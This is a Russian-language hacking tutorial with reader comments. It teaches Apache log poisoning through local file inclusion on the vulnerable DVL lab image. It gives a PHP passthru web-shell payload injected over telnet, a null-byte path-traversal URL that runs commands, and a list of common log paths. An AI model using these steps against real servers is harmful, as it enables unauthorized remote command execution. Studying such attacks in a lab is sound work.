4. Создание веб шела в логах apache через локальный инклуд

Для точного понимания, что тут написано, прочитайте следующие уроки

Что нужно начинающему хакеру

Локальный PHP- инклуд

Удаленный PHP инклуд

Также для урока нам понадобиться образ DVL с созданным инклудом.

Рассмотрим более интересное применение локальной иньекции, создание веб-шелла, действующего через логи(журналы) сервера Apache.

Apache ведет лог-файлы httpd-access.log и httpd-error.log, туда записываются все запросы к веб серверу, нормальные в httpd-access.log а с ошибкой в   httpd-error.log. (в DVL о котором рассказывается в статье что нужно начинающему хакеру журналы называются немного по другому access_log и error_log  и находятся они по адресу /usr/local/apache/logs)

в статье  Локальный PHP- инклуд, приводился пример обычного инклуда, кстати мы работаем с дистриутивам DVL.

введем в браузер следующие  http://localhost/index.php?page=./../../log/access_log%00 отобразиться содержимое файла access_log.

Можете поэкспериментировать ещё с error_log.

Теперь открывает консоль и по протоколу telnet подключаемся к порту 80

telnet 127.0.0.1 80

В  ответ на приглашение вводим GET <pre><?passthru($_GET[‘cmd’]);?></pre>HTTP/1.1

После нажатия на enter у вас скорее всего выведется ошибка 400, но на самом деле у нас все получилось и в логах будет написано следующие

access-log:

127.o.o.1 — — [28/march/2011/:13:00:40 +0300]»GET <pre><?passthru($_GET[‘cmd’]);?></pre>HTTP/1.1

а в error_log можете посмотреть сами почти тоже самое.

Если вы неправильно вели первый раз, то второй раз вводиться не надо так как интерпретатор PHP дойдет до той строчки и выдаст ошибку. ну а так как вы  работаете на локальном компьютере можете удалить данную строчку в логах.

введем в браузер следующие  http://localhost/index.php?page=./../../log/access_log%00&cmd=ls+-la

выполниться команда cmd -la , короче сами увидите.

в различных системах журналы находяться в разных каталогах, вот список:

/logs/

/var/logs/

/var/log/

/var/www/logs/

/var/log/apache/

/var/log/httpd/9

Комментарии (3 комментария) на "4. Создание веб шела в логах apache через локальный инклуд"

  1. Интересная мысль — я запомню. 🙂

  2. Hasselhoff:

    У меня не получается просмотреть логи. «Ввожу http://localhost/index.php?page=./../../log/access_log%00″ в строке, но каждый раз выдает ошибку. Подскажите, в чем может быть проблема?

  3. admin:

    у вас сервер так настроен.

Отправить комментарий